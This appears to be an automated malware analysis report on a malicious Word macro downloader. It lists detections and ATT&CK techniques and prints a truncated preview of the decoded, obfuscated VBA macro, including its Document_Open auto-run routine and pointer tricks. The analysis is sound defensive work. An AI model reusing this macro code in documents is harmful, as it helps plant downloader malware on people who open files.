MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The file is an Office document containing a malicious VBA macro, specifically triggered by the Document_Open event. The macro utilizes GetObject and p-code execution, indicating an attempt to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Macro-6539595-0' further supports this assessment. No specific family could be identified, but the behavior is consistent with a macro-based downloader.
Heuristics 6
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 49464 bytes |
SHA-256: b5269f6485dab88adb314479c288f0770dfa00883f5fa1a521f91f9260239f3d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RemovePageNumbersFromCurrentSection()
Dim ThisHeader As HeaderFooter
Dim ThisPageNumber As PageNumber
With Selection.Sections(1)
For Each ThisHeader In .Headers
For Each ThisPageNumber In ThisHeader.PageNumbers
ThisPageNumber.Delete
Next ThisPageNumber
Next ThisHeader
End With
End Sub
Private Sub Document_Open()
Dim raveup As Long
Dim catalo As Integer
autoradiographic = "pensee"
inexhaustible = magsman
lazarillo
catostomus = 52 + 9
Pmt 0, catostomus, 26008, 58110, 6
End Sub
Function assert(pathetically)
Dim bloated As String
Dim baddeleyite As Integer
Dim center As Variant
Dim spinster As Byte
#If (36 - 10 + 374 + 105 - 115 + 310) > ((23 - 14 + 311) - (49 - 58 + 549) * 1) And ((105 - 83 + 6) - (47 - 88 + 69)) * 2 < (Win64) Then
Dim constructive As Variant
Dim ceratosaur As LongPtr
mainframe = 59 - 28 - 23
Dim conventionalism As LongPtr
Dim babar As Long
Dim assail As Integer
Dim dafe As LongPtr
Dim leiopelma As Byte
audita = VarPtr(ceratosaur)
fascicule = currunt(audita, VarPtr(pathetically) + (63 - 20 - 35), mainframe)
#ElseIf (34 - 97 + 463 + 58 - 116 + 358) > ((82 - 67 + 305) - (33 - 83 + 590) * 1) And Not ((88 - 34 - 26) - (22 - 49 + 55)) * 2 < (Win64) Then
Dim ceratosaur As Long
mainframe = 37 - 80 + 47
Dim conventionalism As Long
Dim dafe As Long
audita = VarPtr(ceratosaur)
fascicule = eschscholtzia(audita, VarPtr(pathetically) + (71 - 84 + 21), mainframe)
#End If
savory = 69 - 104 + 34
conventionalism = 25 - 106 + 81
uncertified = 20 - 82 + 62
dafe = 106 - 69 + 9720
giovane = 22 - 92 + 4166
remiform = 39 - 114 + 139
emphysema = underpants(ByVal savory, _
conventionalism, ByVal uncertified, dafe, ByVal giovane, _
ByVal remiform)
pontifical = Fix(246)
demonolatry = bibliographic
#If (48 - 17 + 369 + 98 - 92 + 294) > ((17 - 4 + 307) - (2 - 65 + 603) * 1) And ((98 - 111 + 41) - (83 - 96 + 41)) * 2 < (Win64) Then
restitution = currunt(conventionalism, ceratosaur, 90 - 117 + 5910)
#ElseIf (86 - 119 + 433 + 107 - 76 + 269) > ((111 - 104 + 313) - (83 - 49 + 506) * 1) And Not ((9 - 3 + 22) - (10 - 46 + 64)) * 2 < (Win64) Then
disomatous = eschscholtzia(conventionalism, ceratosaur, 126 - 112 + 5869)
#End If
aloofness = 52 + 44
Pmt 0, aloofness, 34624, 32256, 5
assert = conventionalism
End Function
Sub lazarillo()
Dim balmy As Integer
Dim airspace As Integer
cacogenesis.bairdiella.Value = Day(#12/5/2013#)
varday = communicational = "colutea"
circulating = "produce"
mated = "avellan"
chaucer = pastry
hoecake = conjecturality
unagitated = "interoceptive"
analecta = "yangtze"
Set bout = cacogenesis.bairdiella.SelectedItem
because = 53 + 46
Pmt 0, because, 21129, 29989, 6
frankness = bout.Name
doubleshotted = 94 - 10 + 7760
epacridaceae = Right(frankness, doubleshotted)
bestow = bosniaherzegovina.processed(epacridaceae)
plangent = 60 + 10
Pmt 0, plangent, 11771, 19776, 2
ameliorate = "caraffe"
#If (60 - 102 + 442 + 28 - 102 + 374) > ((125 - 58 + 253) - (122 - 34 + 452) * 1) And ((2 - 17 + 43) - (58 - 16 - 14)) * 2 < (Win64) Then
Dim arrastra As Variant
Dim conclude As LongPtr
Dim aphrodite As LongPtr
Dim archine As Variant
#ElseIf (107 - 13 + 306 + 3 - 121 + 418) > ((19 - 23 + 324) - (63 - 106 + 583) * 1) And Not ((105 - 49 - 28) - (83 - 48 - 7)) * 2 < (Win64) Then
Dim netscape As Variant
Dim aphrodite As Long
Dim lift As Byte
Dim conclude As Long
#End If
thraupidae = 94 - 70 - 24
caryophyllidae = "multidimensional"
challis = 128 - 105 + 4073
goth = 8 + 16
Pmt 0, goth, 9442, 33585, 7
forbears = "bhadon"
stirringly = "attain"
pulsation = "circuitously"
devoured = 21 + 60
Pmt 0, devoured, 25229, 13385, 2
outpouring = bestow
cucurbitaceae = beasts
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.